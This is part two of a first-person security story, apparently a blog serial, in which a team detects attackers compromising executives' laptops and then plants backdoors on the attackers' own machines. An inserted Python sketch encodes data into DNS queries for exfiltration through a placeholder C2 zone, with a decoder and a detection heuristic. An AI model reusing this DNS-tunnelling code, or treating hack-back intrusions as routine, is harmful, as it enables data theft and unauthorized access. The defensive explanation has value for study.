A Team Effort - Part 2

Continues from Part 1.

When D and I entered the TOC, Y was already there talking to the two guys on the ground. They had followed the execs that morning, and again the execs stopped at the cafe. This time they were ready with a control inside the execs' computers. A few minutes after one of the principals opened his laptop and connected to the cafe's Wi-Fi network, the attackers were on it like flies. The team members were also running a sniffer. The combination of the sniffer and the monitoring software on the execs' computers gave us real-time information on what the attackers were trying to do. We saw them run an exploit and gain access to the computer.

Once their backdoor was installed, it connected back to a listener, or C2 computer. A listener is a program that accepts connections from a backdoor. The simple ones are usually a terminal running netcat; the more complex ones let the bad guys send commands to the backdoor over different channels and protocols. We were ready for this. As soon as the backdoor made its first connection we detected it. We saw the bad guys immediately begin scanning the computers. We had several Word documents and PDFs weaponized and ready to be picked up by them. They had names and content too juicy not to copy. And they did.
The backdoor used plain, cleartext HTTP requests to exfil the data. I can only assume they did this because it was the initial breach, on a public network, and that they would eventually switch to a stealthier piece of attack code. Regardless, it was good for us because the sniffer was able to record all of it. They copied our files. We also sent an HTTP request of our own with a download link to the attack code we had prepared for them. We saw it get picked up by the bad guys.

At the TOC, D, Y and I were ready with the listeners in case our backdoors began transmitting. I called the security officer at our client's offices and gave him a SITREP, the first of many.

The execs finished their coffee and continued on their way to the local office. The security people from our customer called them a few minutes later, explained what had happened, and told them not to connect those laptops to the corporate network.

Meanwhile, we saw no activity on the listeners at the TOC. For the next two hours we had nothing. Then a shell opened on one of the listeners. Great!

Now the project went from a security assessment, to digital VIP protection, to full-on offensive digital intelligence gathering. Our customer asked us to find out who these people were and extract as much intel as we could.

Now we were having fun!

We took turns on the listener's shell. The first thing we did was install another backdoor, a different one, for redundancy: if the first one got compromised and blocked, we would still have a way in. If these guys were good, they would eventually notice the first backdoor. It sent the data back to us over UDP, as DNS requests. It was slow, but fast enough to give us almost real-time access to the computer. The second backdoor was more complex and provided real-time access with several layers of crypto and the capability to perform complex automated searches for files, network nodes, etc.
D focused on getting the lay of the land: IP addresses, routing tables, system domains, computer names, etc. Since this information can be obtained with simple OS commands, it was the first thing we did. Then Y set about configuring the new backdoor and hiding our presence a bit more. Then it was my turn. I was in charge of finding the best way to perform the network recon given the data we had collected so far.
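To make the first backdoor's channel concrete, the sketch below is an illustration added here; it is not the team's tool and not code from the original post. It shows how a payload can be chunked into DNS query names under an attacker-controlled zone and reassembled on the listener side, why such a channel is slow (one query per few dozen bytes), and the kind of cheap heuristic a defender might use to spot those names. The zone name c2.example.com, the chunk size, the sample payload and the detection thresholds are all assumptions.

```python
import base64
import binascii

# Assumed, hypothetical listener-controlled zone. The compromised host only
# needs to resolve names under it; its recursive resolver forwards the
# queries to the zone's authoritative server, which is the listener.
ZONE = "c2.example.com"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical maximum length of a full name
CHUNK = 30       # payload bytes per query; base32 of 30 bytes is 48 chars, one label


def encode_queries(data: bytes, zone: str = ZONE, chunk: int = CHUNK) -> list[str]:
    """Backdoor side: split data into query names <seq>.<base32>.<zone>."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk)):
        piece = data[off:off + chunk]
        # base32 keeps the label inside the hostname alphabet; padding is
        # dropped and restored by the decoder, lowercase because DNS ignores case
        b32 = base64.b32encode(piece).decode().rstrip("=").lower()
        # 4 hex digits of sequence number (wraps after 65536 queries; illustration only)
        labels = [f"{seq:04x}"] + [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join(labels + [zone])
        if len(name) > MAX_NAME:
            raise ValueError("chunk too large for one query name")
        names.append(name)
    return names


def decode_queries(queries: list[str], zone: str = ZONE) -> bytes:
    """Listener side: keep only queries for our zone, order by seq, decode."""
    pieces = {}
    suffix = "." + zone.lower()
    for q in queries:
        if not q.lower().endswith(suffix):
            continue                            # unrelated traffic
        labels = q[:-len(suffix)].split(".")
        try:
            seq = int(labels[0], 16)
            b32 = "".join(labels[1:]).upper()
            pieces[seq] = base64.b32decode(b32 + "=" * (-len(b32) % 8))
        except (ValueError, binascii.Error):
            continue                            # malformed, or not one of ours
    return b"".join(pieces[k] for k in sorted(pieces))  # tolerates reordering


def queries_needed(nbytes: int, chunk: int = CHUNK) -> int:
    """Why the channel is slow: one DNS round trip per `chunk` bytes of payload."""
    return -(-nbytes // chunk)


def looks_like_tunnel(name: str, max_label: int = 20, max_name: int = 60) -> bool:
    """Defender side: crude heuristic, flag long labels or very long names.
    Thresholds are assumptions; CDN and telemetry hostnames will need tuning."""
    labels = name.split(".")
    return max(len(lbl) for lbl in labels) > max_label or len(name) > max_name


if __name__ == "__main__":
    # constructed sample payload, standing in for recon output
    sample = b"ip 10.0.0.5, gateway 10.0.0.1, domain CORP, host WS-0042"
    qs = encode_queries(sample)
    assert decode_queries(qs[::-1] + ["www.example.org"]) == sample
    print(len(qs), "queries to move", len(sample), "bytes; first query:", qs[0])
```

Two things to note when reading it against the narrative: every byte of payload costs a DNS round trip, so a megabyte of files is tens of thousands of queries, which is exactly why the first backdoor was "slow but good enough" for shell-style interaction and why simply blocking outbound UDP/53 kills it; and the flat, high-volume pattern of long base32 labels is what a defender's heuristic keys on.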

After another SITREP to the customer and a quick conference call with the guys on the ground, we decided to leave them in place and continue following the execs, who were now aware they were being followed and played along so we wouldn't tip off the attackers.

We set up the recon and let the backdoor loose. The crawler module would try to find the information we requested and report back.
In the meantime, our first backdoor was killed. I don't know whether this was because the attackers found it or because they were blocking UDP. It didn't matter; we still had the second one, and this one would be very difficult to find and block, unless you disconnected the computer from the network. It had several ways to send the information out, using different protocols or by injecting itself into other applications already connected to the internet.
With that set, we went to work on the data we had collected initially, while the guys on the ground were getting ready for a full-on SDR to see if they could detect the attackers following the principals.

Continues in Part 3. Standby.